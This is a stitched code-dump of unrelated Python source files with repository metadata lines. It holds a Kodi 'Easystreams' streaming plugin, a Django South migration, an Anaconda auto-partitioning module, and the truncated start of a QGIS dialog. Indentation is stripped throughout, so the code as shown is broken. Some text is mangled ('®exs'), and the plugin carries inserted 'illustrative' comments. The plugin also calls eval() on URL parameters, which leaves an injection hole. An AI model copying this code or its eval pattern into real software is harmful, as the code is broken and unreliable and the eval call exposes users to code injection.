addDir(i['title'].encode('utf-8'),i['url'].encode('utf-8'),1,thumb,fanart,desc,genre,date,credits,'source')
else:
if len(sources) == 1:
if isinstance(sources[0], list):
getData(sources[0][1].encode('utf-8'),FANART)
else:
getData(sources[0]['url'], sources[0]['fanart'])
def addSource(url=None):
if url is None:
if not addon.getSetting("new_file_source") == "":
source_url = addon.getSetting('new_file_source').decode('utf-8')
elif not addon.getSetting("new_url_source") == "":
source_url = addon.getSetting('new_url_source').decode('utf-8')
else:
source_url = url
if source_url == '' or source_url is None:
return
addon_log('Adding New Source: '+source_url.encode('utf-8'))
media_info = None
data = getSoup(source_url)
if data.find('channels_info'):
media_info = data.channels_info
elif data.find('items_info'):
media_info = data.items_info
if media_info:
source_media = {}
source_media['url'] = source_url
try: source_media['title'] = media_info.title.string
except: pass
try: source_media['thumbnail'] = media_info.thumbnail.string
except: pass
try: source_media['fanart'] = media_info.fanart.string
except: pass
try: source_media['genre'] = media_info.genre.string
except: pass
try: source_media['description'] = media_info.description.string
except: pass
try: source_media['date'] = media_info.date.string
except: pass
try: source_media['credits'] = media_info.credits.string
except: pass
else:
if '/' in source_url:
nameStr = source_url.split('/')[-1].split('.')[0]
if '\\' in source_url:
nameStr = source_url.split('\\')[-1].split('.')[0]
if '%' in nameStr:
nameStr = urllib.unquote_plus(nameStr)
keyboard = xbmc.Keyboard(nameStr,'Displayed Name, Rename?')
keyboard.doModal()
if (keyboard.isConfirmed() == False):
return
newStr = keyboard.getText()
if len(newStr) == 0:
return
source_media = {}
source_media['title'] = newStr
source_media['url'] = source_url
source_media['fanart'] = fanart
if os.path.exists(source_file)==False:
source_list = []
source_list.append(source_media)
b = open(source_file,"w")
b.write(json.dumps(source_list))
b.close()
else:
sources = json.loads(open(source_file,"r").read())
sources.append(source_media)
b = open(source_file,"w")
b.write(json.dumps(sources))
b.close()
addon.setSetting('new_url_source', "")
addon.setSetting('new_file_source', "")
xbmc.executebuiltin("XBMC.Notification(Easystreams,New source added.,5000,"+icon+")")
if not url is None:
if 'xbmcplus.xb.funpic.de' in url:
xbmc.executebuiltin("XBMC.Container.Update(%s?mode=14,replace)" %sys.argv[0])
elif 'community-links' in url:
xbmc.executebuiltin("XBMC.Container.Update(%s?mode=10,replace)" %sys.argv[0])
else: addon.openSettings()
def rmSource(name):
sources = json.loads(open(source_file,"r").read())
for index in range(len(sources)):
if isinstance(sources[index], list):
if sources[index][0] == name:
del sources[index]
b = open(source_file,"w")
b.write(json.dumps(sources))
b.close()
break
else:
if sources[index]['title'] == name:
del sources[index]
b = open(source_file,"w")
b.write(json.dumps(sources))
b.close()
break
xbmc.executebuiltin("XBMC.Container.Refresh")
def get_xml_database(url, browse=False):
if url is None:
url = 'http://xbmcplus.xb.funpic.de/www-data/filesystem/'
soup = BeautifulSoup(makeRequest(url), convertEntities=BeautifulSoup.HTML_ENTITIES)
for i in soup('a'):
href = i['href']
if not href.startswith('?'):
name = i.string
if name not in ['Parent Directory', 'recycle_bin/']:
if href.endswith('/'):
if browse:
addDir(name,url+href,15,icon,fanart,'','','')
else:
addDir(name,url+href,14,icon,fanart,'','','')
elif href.endswith('.xml'):
if browse:
addDir(name,url+href,1,icon,fanart,'','','','','download')
else:
if os.path.exists(source_file)==True:
if name in SOURCES:
addDir(name+' (in use)',url+href,11,icon,fanart,'','','','','download')
else:
addDir(name,url+href,11,icon,fanart,'','','','','download')
else:
addDir(name,url+href,11,icon,fanart,'','','','','download')
def getCommunitySources(browse=False):
url = 'http://github.com/easystreams2/'
soup = BeautifulSoup(makeRequest(url), convertEntities=BeautifulSoup.HTML_ENTITIES)
files = soup('ul')[0]('li')[1:]
for i in files:
name = i('a')[0]['href']
if browse:
addDir(name,url+name,1,icon,fanart,'','','','','download')
else:
addDir(name,url+name,11,icon,fanart,'','','','','download')
def getSoup(url):
if url.startswith('http://'):
data = makeRequest(url)
else:
if xbmcvfs.exists(url):
if url.startswith("smb://") or url.startswith("nfs://"):
copy = xbmcvfs.copy(url, os.path.join(profile, 'temp', 'sorce_temp.txt'))
if copy:
data = open(os.path.join(profile, 'temp', 'sorce_temp.txt'), "r").read()
xbmcvfs.delete(os.path.join(profile, 'temp', 'sorce_temp.txt'))
else:
addon_log("failed to copy from smb:")
else:
data = open(url, 'r').read()
else:
addon_log("Soup Data not found!")
return
return BeautifulSOAP(data, convertEntities=BeautifulStoneSoup.XML_ENTITIES)
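# The functions below expect source files shaped roughly like this (a minimal
# sketch reconstructed from the element names read in getData()/getItems();
# real files may carry more optional tags such as fanart, info, genre, date):
#
#     <channels>
#       <channel>
#         <name>Example channel</name>
#         <thumbnail>http://host.example/thumb.png</thumbnail>
#         <item>
#           <title>Example stream</title>
#           <link>http://host.example/stream.m3u8</link>
#         </item>
#       </channel>
#     </channels>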
def getData(url,fanart):
soup = getSoup(url)
if len(soup('channels')) > 0:
channels = soup('channel')
for channel in channels:
name = channel('name')[0].string
thumbnail = channel('thumbnail')[0].string
if thumbnail == None:
thumbnail = ''
try:
if not channel('fanart'):
if addon.getSetting('use_thumb') == "true":
fanArt = thumbnail
else:
fanArt = fanart
else:
fanArt = channel('fanart')[0].string
if fanArt == None:
raise
except:
fanArt = fanart
try:
desc = channel('info')[0].string
if desc == None:
raise
except:
desc = ''
try:
genre = channel('genre')[0].string
if genre == None:
raise
except:
genre = ''
try:
date = channel('date')[0].string
if date == None:
raise
except:
date = ''
try:
credits = channel('credits')[0].string
if credits == None:
raise
except:
credits = ''
try:
addDir(name.encode('utf-8', 'ignore'),url.encode('utf-8'),2,thumbnail,fanArt,desc,genre,date,credits,True)
except:
addon_log('There was a problem adding directory from getData(): '+name.encode('utf-8', 'ignore'))
else:
addon_log('No Channels: getItems')
getItems(soup('item'),fanart)
def getChannelItems(name,url,fanart):
soup = getSoup(url)
channel_list = soup.find('channel', attrs={'name' : name.decode('utf-8')})
items = channel_list('item')
try:
fanArt = channel_list('fanart')[0].string
if fanArt == None:
raise
except:
fanArt = fanart
for channel in channel_list('subchannel'):
name = channel('name')[0].string
try:
thumbnail = channel('thumbnail')[0].string
if thumbnail == None:
raise
except:
thumbnail = ''
try:
if not channel('fanart'):
if addon.getSetting('use_thumb') == "true":
fanArt = thumbnail
else:
fanArt = channel('fanart')[0].string
if fanArt == None:
raise
except:
pass
try:
desc = channel('info')[0].string
if desc == None:
raise
except:
desc = ''
try:
genre = channel('genre')[0].string
if genre == None:
raise
except:
genre = ''
try:
date = channel('date')[0].string
if date == None:
raise
except:
date = ''
try:
credits = channel('credits')[0].string
if credits == None:
raise
except:
credits = ''
try:
addDir(name.encode('utf-8', 'ignore'),url.encode('utf-8'),3,thumbnail,fanArt,desc,genre,credits,date)
except:
addon_log('There was a problem adding directory - '+name.encode('utf-8', 'ignore'))
getItems(items,fanArt)
def getSubChannelItems(name,url,fanart):
soup = getSoup(url)
channel_list = soup.find('subchannel', attrs={'name' : name.decode('utf-8')})
items = channel_list('subitem')
getItems(items,fanart)
def getItems(items,fanart):
total = len(items)
addon_log('Total Items: %s' %total)
for item in items:
try:
name = item('title')[0].string
if name is None:
name = 'unknown?'
except:
addon_log('Name Error')
name = ''
try:
if item('epg'):
if item.epg_url:
addon_log('Get EPG Regex')
epg_url = item.epg_url.string
epg_regex = item.epg_regex.string
epg_name = get_epg(epg_url, epg_regex)
if epg_name:
name += ' - ' + epg_name
elif item('epg')[0].string > 1:
name += getepg(item('epg')[0].string)
else:
pass
except:
addon_log('EPG Error')
try:
url = []
for i in item('link'):
if not i.string == None:
url.append(i.string)
if len(url) < 1:
raise
except:
addon_log('Error <link> element, Passing:'+name.encode('utf-8', 'ignore'))
continue
try:
thumbnail = item('thumbnail')[0].string
if thumbnail == None:
raise
except:
thumbnail = ''
try:
if not item('fanart'):
if addon.getSetting('use_thumb') == "true":
fanArt = thumbnail
else:
fanArt = fanart
else:
fanArt = item('fanart')[0].string
if fanArt == None:
raise
except:
fanArt = fanart
try:
desc = item('info')[0].string
if desc == None:
raise
except:
desc = ''
try:
genre = item('genre')[0].string
if genre == None:
raise
except:
genre = ''
try:
date = item('date')[0].string
if date == None:
raise
except:
date = ''
regexs = None
if item('regex'):
try:
regexs = {}
for i in item('regex'):
regexs[i('name')[0].string] = {}
regexs[i('name')[0].string]['expre'] = i('expres')[0].string
regexs[i('name')[0].string]['page'] = i('page')[0].string
try:
regexs[i('name')[0].string]['refer'] = i('referer')[0].string
except:
addon_log("Regex: -- No Referer --")
try:
regexs[i('name')[0].string]['agent'] = i('agent')[0].string
except:
addon_log("Regex: -- No User Agent --")
try:
regexs[i('name')[0].string]['data'] = i('data')[0].string
except:
addon_log("Regex: -- No data --")
try:
regexs[i('name')[0].string]['function'] = i('function')[0].string
except:
addon_log("Regex: -- No function --")
regexs = urllib.quote(repr(regexs))
except:
regexs = None
addon_log('regex Error: '+name.encode('utf-8', 'ignore'))
try:
if len(url) > 1:
alt = 0
playlist = []
for i in url:
playlist.append(i)
if addon.getSetting('add_playlist') == "false":
for i in url:
alt += 1
addLink(i,'%s) %s' %(alt, name.encode('utf-8', 'ignore')),thumbnail,fanArt,desc,genre,date,True,playlist,regexs,total)
else:
addLink('', name.encode('utf-8', 'ignore'),thumbnail,fanArt,desc,genre,date,True,playlist,regexs,total)
else:
addLink(url[0],name.encode('utf-8', 'ignore'),thumbnail,fanArt,desc,genre,date,True,None,regexs,total)
except:
addon_log('There was a problem adding item - '+name.encode('utf-8', 'ignore'))
def getRegexParsed(regexs, url):
regexs = eval(urllib.unquote(regexs))
cachedPages = {}
doRegexs = re.compile('\$doregex\[([^\]]*)\]').findall(url)
for k in doRegexs:
if k in regexs:
m = regexs[k]
if m['page'] in cachedPages:
link = cachedPages[m['page']]
else:
addon_log('get regexs: %s' %m['page'])
req = urllib2.Request(m['page'])
req.add_header('User-Agent', 'Mozilla/5.0 (Windows NT 6.1; rv:14.0) Gecko/20100101 Firefox/14.0.1')
if 'refer' in m:
req.add_header('Referer', m['refer'])
if 'agent' in m:
req.add_header('User-agent', m['agent'])
if 'data' in m:
req.add_data(m['data'])
if m.has_key('function') and m['function'] == 'NoRedirection':
addon_log('regex function NoRedirection')
opener = urllib2.build_opener(NoRedirection)
urllib2.install_opener(opener)
link = urllib2.urlopen(req)
else:
response = urllib2.urlopen(req)
link = response.read()
response.close()
cachedPages[m['page']] = link
reg = re.compile(m['expre']).search(link)
data = reg.group(1).strip()
if m.has_key('function') and m['function'] == 'unquote':
data = urllib.unquote(data)
addon_log('Reg urllib.unquote(data): %s' %data)
addon_log('Reg data: %s' %data)
url = url.replace("$doregex[" + k + "]", data)
item = xbmcgui.ListItem(path=url)
xbmcplugin.setResolvedUrl(int(sys.argv[1]), True, item)
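# --- Illustrative note (not part of the original plugin; names hypothetical) ---
# A channel <link> can embed "$doregex[NAME]" tokens. For each token,
# getRegexParsed fetches regexs[NAME]['page'], applies regexs[NAME]['expre'],
# and substitutes match group(1) back into the URL. For example, a link of
# "http://host/stream?auth=$doregex[token]" would be resolved using the
# page/expres pair defined in its <regex><name>token</name>...</regex> block.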
class NoRedirection(urllib2.HTTPErrorProcessor):
def http_response(self, request, response):
return str(response.info())
def get_params():
param=[]
paramstring=sys.argv[2]
if len(paramstring)>=2:
params=sys.argv[2]
cleanedparams=params.replace('?','')
if (params[len(params)-1]=='/'):
params=params[0:len(params)-1]
pairsofparams=cleanedparams.split('&')
param={}
for i in range(len(pairsofparams)):
splitparams={}
splitparams=pairsofparams[i].split('=')
if (len(splitparams))==2:
param[splitparams[0]]=splitparams[1]
return param
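# --- Usage sketch (illustrative only; values hypothetical) ---
# get_params() turns the plugin query string in sys.argv[2] into a dict.
# Given sys.argv[2] == "?url=http%3A%2F%2Fexample.com&mode=1", it returns
# {'url': 'http%3A%2F%2Fexample.com', 'mode': '1'}; values are still
# URL-quoted and are unquoted further down with urllib.unquote_plus().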
def getFavorites():
items = json.loads(open(favorites).read())
total = len(items)
for i in items:
name = i[0]
url = i[1]
iconimage = i[2]
try:
fanArt = i[3]
if fanArt == None:
raise
except:
if addon.getSetting('use_thumb') == "true":
fanArt = iconimage
else:
fanArt = fanart
try: playlist = i[5]
except: playlist = None
try: regexs = i[6]
except: regexs = None
if i[4] == 0:
addLink(url,name,iconimage,fanArt,'','','','fav',playlist,regexs,total)
else:
addDir(name,url,i[4],iconimage,fanart,'','','','','fav')
def addFavorite(name,url,iconimage,fanart,mode,playlist=None,regexs=None):
favList = []
try:
# names may arrive as unicode; encode defensively before storing
name = name.encode('utf-8', 'ignore')
except:
pass
if os.path.exists(favorites)==False:
addon_log('Making Favorites File')
favList.append((name,url,iconimage,fanart,mode,playlist,regexs))
a = open(favorites, "w")
a.write(json.dumps(favList))
a.close()
else:
addon_log('Appending Favorites')
a = open(favorites).read()
data = json.loads(a)
data.append((name,url,iconimage,fanart,mode,playlist,regexs))
b = open(favorites, "w")
b.write(json.dumps(data))
b.close()
def rmFavorite(name):
data = json.loads(open(favorites).read())
for index in range(len(data)):
if data[index][0]==name:
del data[index]
b = open(favorites, "w")
b.write(json.dumps(data))
b.close()
break
xbmc.executebuiltin("XBMC.Container.Refresh")
def play_playlist(name, list):
playlist = xbmc.PlayList(1)
playlist.clear()
item = 0
for i in list:
item += 1
info = xbmcgui.ListItem('%s) %s' %(str(item),name))
playlist.add(i, info)
xbmc.executebuiltin('playlist.playoffset(video,0)')
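# --- Usage sketch (illustrative only; URLs hypothetical) ---
# play_playlist('Channel', ['http://host/a.m3u8', 'http://host/b.m3u8'])
# queues both links as "1) Channel" and "2) Channel" in the video playlist
# and starts playback from the first entry.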
def download_file(name, url):
if addon.getSetting('save_location') == "":
xbmc.executebuiltin("XBMC.Notification('Easystreams','Choose a location to save files.',15000,"+icon+")")
addon.openSettings()
params = {'url': url, 'download_path': addon.getSetting('save_location')}
downloader.download(name, params)
dialog = xbmcgui.Dialog()
ret = dialog.yesno('Easystreams', 'Do you want to add this file as a source?')
if ret:
addSource(os.path.join(addon.getSetting('save_location'), name))
def addDir(name,url,mode,iconimage,fanart,description,genre,date,credits,showcontext=False):
u=sys.argv[0]+"?url="+urllib.quote_plus(url)+"&mode="+str(mode)+"&name="+urllib.quote_plus(name)+"&fanart="+urllib.quote_plus(fanart)
ok=True
if date == '':
date = None
else:
description += '\n\nDate: %s' %date
liz=xbmcgui.ListItem(name, iconImage="DefaultFolder.png", thumbnailImage=iconimage)
liz.setInfo(type="Video", infoLabels={ "Title": name, "Plot": description, "Genre": genre, "dateadded": date, "credits": credits })
liz.setProperty("Fanart_Image", fanart)
if showcontext:
contextMenu = []
if showcontext == 'source':
if name in str(SOURCES):
contextMenu.append(('Remove from Sources','XBMC.RunPlugin(%s?mode=8&name=%s)' %(sys.argv[0], urllib.quote_plus(name))))
elif showcontext == 'download':
contextMenu.append(('Download','XBMC.RunPlugin(%s?url=%s&mode=9&name=%s)'
%(sys.argv[0], urllib.quote_plus(url), urllib.quote_plus(name))))
elif showcontext == 'fav':
contextMenu.append(('Remove from Easystreams Favorites','XBMC.RunPlugin(%s?mode=6&name=%s)'
%(sys.argv[0], urllib.quote_plus(name))))
if not name in FAV:
contextMenu.append(('Add to Easystreams Favorites','XBMC.RunPlugin(%s?mode=5&name=%s&url=%s&iconimage=%s&fanart=%s&fav_mode=%s)'
%(sys.argv[0], urllib.quote_plus(name), urllib.quote_plus(url), urllib.quote_plus(iconimage), urllib.quote_plus(fanart), mode)))
liz.addContextMenuItems(contextMenu)
ok=xbmcplugin.addDirectoryItem(handle=int(sys.argv[1]),url=u,listitem=liz,isFolder=True)
return ok
def addLink(url,name,iconimage,fanart,description,genre,date,showcontext,playlist,regexs,total):
try:
name = name.encode('utf-8')
except: pass
ok = True
if regexs: mode = '17'
else: mode = '12'
u=sys.argv[0]+"?"
play_list = False
if playlist:
if addon.getSetting('add_playlist') == "false":
u += "url="+urllib.quote_plus(url)+"&mode="+mode
else:
u += "mode=13&name=%s&playlist=%s" %(urllib.quote_plus(name), urllib.quote_plus(str(playlist).replace(',','|')))
play_list = True
else:
u += "url="+urllib.quote_plus(url)+"&mode="+mode
if regexs:
u += "®exs="+regexs
if date == '':
date = None
else:
description += '\n\nDate: %s' %date
liz=xbmcgui.ListItem(name, iconImage="DefaultVideo.png", thumbnailImage=iconimage)
liz.setInfo(type="Video", infoLabels={ "Title": name, "Plot": description, "Genre": genre, "dateadded": date })
liz.setProperty("Fanart_Image", fanart)
if not play_list:
liz.setProperty('IsPlayable', 'true')
if showcontext:
contextMenu = []
if showcontext == 'fav':
contextMenu.append(
('Remove from Easystreams Favorites','XBMC.RunPlugin(%s?mode=6&name=%s)'
%(sys.argv[0], urllib.quote_plus(name)))
)
elif not name in FAV:
fav_params = (
'%s?mode=5&name=%s&url=%s&iconimage=%s&fanart=%s&fav_mode=0'
%(sys.argv[0], urllib.quote_plus(name), urllib.quote_plus(url), urllib.quote_plus(iconimage), urllib.quote_plus(fanart))
)
if playlist:
fav_params += '&playlist='+urllib.quote_plus(str(playlist).replace(',','|'))
if regexs:
fav_params += "®exs="+regexs
contextMenu.append(('Add to Easystreams Favorites','XBMC.RunPlugin(%s)' %fav_params))
liz.addContextMenuItems(contextMenu)
if not playlist is None:
if addon.getSetting('add_playlist') == "false":
playlist_name = name.split(') ')[1]
contextMenu_ = [
('Play '+playlist_name+' PlayList','XBMC.RunPlugin(%s?mode=13&name=%s&playlist=%s)'
%(sys.argv[0], urllib.quote_plus(playlist_name), urllib.quote_plus(str(playlist).replace(',','|'))))
]
liz.addContextMenuItems(contextMenu_)
ok=xbmcplugin.addDirectoryItem(handle=int(sys.argv[1]),url=u,listitem=liz,totalItems=total)
return ok
## Thanks to daschacka, an epg scraper for http://i.teleboy.ch/programm/station_select.php
## http://forum.xbmc.org/showpost.php?p=936228&postcount=1076
def getepg(link):
url=urllib.urlopen(link)
source=url.read()
url.close()
source2 = source.split("Jetzt")
source3 = source2[1].split('programm/detail.php?const_id=')
sourceuhrzeit = source3[1].split('<br /><a href="/')
nowtime = sourceuhrzeit[0][40:len(sourceuhrzeit[0])]
sourcetitle = source3[2].split("</a></p></div>")
nowtitle = sourcetitle[0][17:len(sourcetitle[0])]
nowtitle = nowtitle.encode('utf-8')
return " - "+nowtitle+" - "+nowtime
def get_epg(url, regex):
data = makeRequest(url)
try:
item = re.findall(regex, data)[0]
return item
except:
addon_log('regex failed')
addon_log(regex)
return
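# --- Illustrative note (not part of the original plugin) ---
# get_epg() is a thin wrapper around re.findall: for a page such as
# "<p>Now: Evening News</p>" and the regex "Now: (.+?)</p>", it would
# return "Evening News", which getItems() appends to the channel name.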
xbmcplugin.setContent(int(sys.argv[1]), 'movies')
try:
xbmcplugin.addSortMethod(int(sys.argv[1]), xbmcplugin.SORT_METHOD_UNSORTED)
except:
pass
try:
xbmcplugin.addSortMethod(int(sys.argv[1]), xbmcplugin.SORT_METHOD_LABEL)
except:
pass
try:
xbmcplugin.addSortMethod(int(sys.argv[1]), xbmcplugin.SORT_METHOD_DATE)
except:
pass
try:
xbmcplugin.addSortMethod(int(sys.argv[1]), xbmcplugin.SORT_METHOD_GENRE)
except:
pass
params=get_params()
url=None
name=None
mode=None
playlist=None
iconimage=None
fanart=FANART
playlist=None
fav_mode=None
regexs=None
try:
url=urllib.unquote_plus(params["url"]).decode('utf-8')
except:
pass
try:
name=urllib.unquote_plus(params["name"])
except:
pass
try:
iconimage=urllib.unquote_plus(params["iconimage"])
except:
pass
try:
fanart=urllib.unquote_plus(params["fanart"])
except:
pass
try:
mode=int(params["mode"])
except:
pass
try:
playlist=eval(urllib.unquote_plus(params["playlist"]).replace('|',','))
except:
pass
try:
fav_mode=int(params["fav_mode"])
except:
pass
try:
regexs=params["regexs"]
except:
pass
addon_log("Mode: "+str(mode))
if not url is None:
addon_log("URL: "+str(url.encode('utf-8')))
addon_log("Name: "+str(name))
if mode==None:
addon_log("getSources")
getSources()
xbmcplugin.endOfDirectory(int(sys.argv[1]))
elif mode==1:
addon_log("getData")
getData(url,fanart)
xbmcplugin.endOfDirectory(int(sys.argv[1]))
elif mode==2:
addon_log("getChannelItems")
getChannelItems(name,url,fanart)
xbmcplugin.endOfDirectory(int(sys.argv[1]))
elif mode==3:
addon_log("getSubChannelItems")
getSubChannelItems(name,url,fanart)
xbmcplugin.endOfDirectory(int(sys.argv[1]))
elif mode==4:
addon_log("getFavorites")
getFavorites()
xbmcplugin.endOfDirectory(int(sys.argv[1]))
elif mode==5:
addon_log("addFavorite")
try:
name = name.split('\\ ')[1]
except:
pass
try:
name = name.split(' - ')[0]
except:
pass
addFavorite(name,url,iconimage,fanart,fav_mode)
elif mode==6:
addon_log("rmFavorite")
try:
name = name.split('\\ ')[1]
except:
pass
try:
name = name.split(' - ')[0]
except:
pass
rmFavorite(name)
elif mode==7:
addon_log("addSource")
addSource(url)
elif mode==8:
addon_log("rmSource")
rmSource(name)
elif mode==9:
addon_log("download_file")
download_file(name, url)
elif mode==10:
addon_log("getCommunitySources")
getCommunitySources()
elif mode==11:
addon_log("addSource")
addSource(url)
elif mode==12:
addon_log("setResolvedUrl")
item = xbmcgui.ListItem(path=url)
xbmcplugin.setResolvedUrl(int(sys.argv[1]), True, item)
elif mode==13:
addon_log("play_playlist")
play_playlist(name, playlist)
elif mode==14:
addon_log("get_xml_database")
get_xml_database(url)
xbmcplugin.endOfDirectory(int(sys.argv[1]))
elif mode==15:
addon_log("browse_xml_database")
get_xml_database(url, True)
xbmcplugin.endOfDirectory(int(sys.argv[1]))
elif mode==16:
addon_log("browse_community")
getCommunitySources(True)
xbmcplugin.endOfDirectory(int(sys.argv[1]))
elif mode==17:
addon_log("getRegexParsed")
getRegexParsed(regexs, url)
|
Easystreams/plugin.video.easystreams-1.63
|
default.py
|
Python
|
gpl-2.0
| 34,357
|
# -*- coding: utf-8 -*-
from south.utils import datetime_utils as datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Changing field 'WordsSet.orderby'
db.alter_column(u'game_wordsset', 'orderby', self.gf('django.db.models.fields.CharField')(max_length=64, null=True))
# Changing field 'WordsSet.pernum'
db.alter_column(u'game_wordsset', 'pernum', self.gf('django.db.models.fields.IntegerField')(null=True))
# Changing field 'Words.level'
db.alter_column(u'game_words', 'level', self.gf('django.db.models.fields.IntegerField')(null=True))
# Changing field 'Words.features'
db.alter_column(u'game_words', 'features', self.gf('django.db.models.fields.TextField')(max_length=256, null=True))
def backwards(self, orm):
# Changing field 'WordsSet.orderby'
db.alter_column(u'game_wordsset', 'orderby', self.gf('django.db.models.fields.CharField')(default=None, max_length=64))
# Changing field 'WordsSet.pernum'
db.alter_column(u'game_wordsset', 'pernum', self.gf('django.db.models.fields.IntegerField')(default=None))
# Changing field 'Words.level'
db.alter_column(u'game_words', 'level', self.gf('django.db.models.fields.IntegerField')(default=None))
# Changing field 'Words.features'
db.alter_column(u'game_words', 'features', self.gf('django.db.models.fields.TextField')(default=None, max_length=256))
models = {
u'game.words': {
'Meta': {'object_name': 'Words'},
'classify': ('django.db.models.fields.CharField', [], {'max_length': '32', 'null': 'True', 'blank': 'True'}),
'features': ('django.db.models.fields.TextField', [], {'max_length': '256', 'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'level': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '64'})
},
u'game.wordsset': {
'Meta': {'object_name': 'WordsSet'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'orderby': ('django.db.models.fields.CharField', [], {'max_length': '64', 'null': 'True', 'blank': 'True'}),
'pernum': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'})
}
}
complete_apps = ['game']
|
zdilby/word-turn-off
|
migrations/0002_auto__chg_field_wordsset_orderby__chg_field_wordsset_pernum__chg_field.py
|
Python
|
gpl-2.0
| 2,605
|
#
# Auto partitioning module.
#
# Copyright (C) 2018 Red Hat, Inc.
#
# This copyrighted material is made available to anyone wishing to use,
# modify, copy, or redistribute it subject to the terms and conditions of
# the GNU General Public License v.2, or (at your option) any later version.
# This program is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY expressed or implied, including the implied warranties of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General
# Public License for more details. You should have received a copy of the
# GNU General Public License along with this program; if not, write to the
# Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA
# 02110-1301, USA. Any Red Hat trademarks that are incorporated in the
# source code or documentation are not subject to the GNU General Public
# License and may only be used or replicated with the express permission of
# Red Hat, Inc.
#
import copy
from pyanaconda.anaconda_loggers import get_module_logger
from pyanaconda.core.constants import DEFAULT_AUTOPART_TYPE
from pyanaconda.core.signal import Signal
from pyanaconda.modules.common.structures.partitioning import PartitioningRequest
from pyanaconda.modules.storage.partitioning.automatic.resizable_module import \
ResizableDeviceTreeModule
from pyanaconda.modules.storage.partitioning.base import PartitioningModule
from pyanaconda.modules.storage.partitioning.automatic.automatic_interface import \
AutoPartitioningInterface
from pyanaconda.modules.storage.partitioning.constants import PartitioningMethod
from pyanaconda.modules.storage.partitioning.automatic.automatic_partitioning import \
AutomaticPartitioningTask
log = get_module_logger(__name__)
class AutoPartitioningModule(PartitioningModule):
"""The auto partitioning module."""
def __init__(self):
"""Initialize the module."""
super().__init__()
self.request_changed = Signal()
self._request = PartitioningRequest()
@property
def partitioning_method(self):
"""Type of the partitioning method."""
return PartitioningMethod.AUTOMATIC
def for_publication(self):
"""Return a DBus representation."""
return AutoPartitioningInterface(self)
def _create_device_tree(self):
"""Create the device tree module."""
return ResizableDeviceTreeModule()
def process_kickstart(self, data):
"""Process the kickstart data."""
request = PartitioningRequest()
if data.autopart.type is not None:
request.partitioning_scheme = data.autopart.type
if data.autopart.fstype:
request.file_system_type = data.autopart.fstype
if data.autopart.noboot:
request.excluded_mount_points.append("/boot")
if data.autopart.nohome:
request.excluded_mount_points.append("/home")
if data.autopart.noswap:
request.excluded_mount_points.append("swap")
if data.autopart.encrypted:
request.encrypted = True
request.passphrase = data.autopart.passphrase
request.cipher = data.autopart.cipher
request.luks_version = data.autopart.luks_version
request.pbkdf = data.autopart.pbkdf
request.pbkdf_memory = data.autopart.pbkdf_memory
request.pbkdf_time = data.autopart.pbkdf_time
request.pbkdf_iterations = data.autopart.pbkdf_iterations
request.escrow_certificate = data.autopart.escrowcert
request.backup_passphrase_enabled = data.autopart.backuppassphrase
self.set_request(request)
def setup_kickstart(self, data):
"""Setup the kickstart data."""
data.autopart.autopart = True
data.autopart.fstype = self.request.file_system_type
if self.request.partitioning_scheme != DEFAULT_AUTOPART_TYPE:
data.autopart.type = self.request.partitioning_scheme
data.autopart.nohome = "/home" in self.request.excluded_mount_points
data.autopart.noboot = "/boot" in self.request.excluded_mount_points
data.autopart.noswap = "swap" in self.request.excluded_mount_points
data.autopart.encrypted = self.request.encrypted
# Don't generate sensitive information.
data.autopart.passphrase = ""
data.autopart.cipher = self.request.cipher
data.autopart.luks_version = self.request.luks_version
data.autopart.pbkdf = self.request.pbkdf
data.autopart.pbkdf_memory = self.request.pbkdf_memory
data.autopart.pbkdf_time = self.request.pbkdf_time
data.autopart.pbkdf_iterations = self.request.pbkdf_iterations
data.autopart.escrowcert = self.request.escrow_certificate
data.autopart.backuppassphrase = self.request.backup_passphrase_enabled
@property
def request(self):
"""The partitioning request."""
return self._request
def set_request(self, request):
"""Set the partitioning request.
:param request: a request
"""
self._request = request
self.request_changed.emit()
log.debug("Request is set to '%s'.", request)
def requires_passphrase(self):
"""Is the default passphrase required?
:return: True or False
"""
return self.request.encrypted and not self.request.passphrase
def set_passphrase(self, passphrase):
"""Set a default passphrase for all encrypted devices.
:param passphrase: a string with a passphrase
"""
# Update the request with a new copy.
request = copy.deepcopy(self.request)
request.passphrase = passphrase
self.set_request(request)
def configure_with_task(self):
"""Schedule the partitioning actions."""
return AutomaticPartitioningTask(self.storage, self.request)
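# --- Usage sketch (illustrative, not part of the module) ---
# A caller would typically enable encryption by replacing the request:
#
#   module = AutoPartitioningModule()
#   request = copy.deepcopy(module.request)
#   request.encrypted = True
#   module.set_request(request)
#   if module.requires_passphrase():
#       module.set_passphrase("hunter2")  # hypothetical passphrase
#   task = module.configure_with_task()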
|
atodorov/anaconda
|
pyanaconda/modules/storage/partitioning/automatic/automatic_module.py
|
Python
|
gpl-2.0
| 5,929
|
# -*- coding: utf-8 -*-
"""
/***************************************************************************
geopunt4QgisAboutdialog
A QGIS plugin
"Tool om geopunt in QGIS te gebruiken"
-------------------
begin : 2013-12-08
copyright : (C) 2013 by Kay Warrie
email : kaywarrie@gmail.com
***************************************************************************/
/***************************************************************************
* *
* This program is free software; you can redistribute it and/or modify *
* it under the terms of the GNU General Public License as published by *
* the Free Software Foundation; either version 2 of the License, or *
* (at your option) any later version. *
* *
***************************************************************************/
"""
import os.path
from qgis.PyQt.QtCore import Qt, QSettings, QTranslator, QCoreApplication
from qgis.PyQt.QtWidgets import QPushButton, QDialog, QDialogButtonBox
from .ui_geopunt4QgisAbout import Ui_aboutDlg
class geopunt4QgisAboutDialog(QDialog):
def __init__(self):
QDialog.__init__(self, None)
self.setWindowFlags( self.windowFlags() & ~Qt.WindowContextHelpButtonHint )
self.setWindowFlags( self.windowFlags() | Qt.WindowStaysOnTopHint)
# initialize locale
locale = QSettings().value("locale/userLocale", "en")
if not locale: locale = 'en'
else: locale = locale[0:2]
localePath = os.path.join(os.path.dirname(__file__), 'i18n',
'geopunt4qgis_{}.qm'.format(locale))
if os.path.exists(localePath):
self.translator = QTranslator()
self.translator.load(localePath)
QCoreApplication.installTranslator(self.translator)
if locale == 'en':
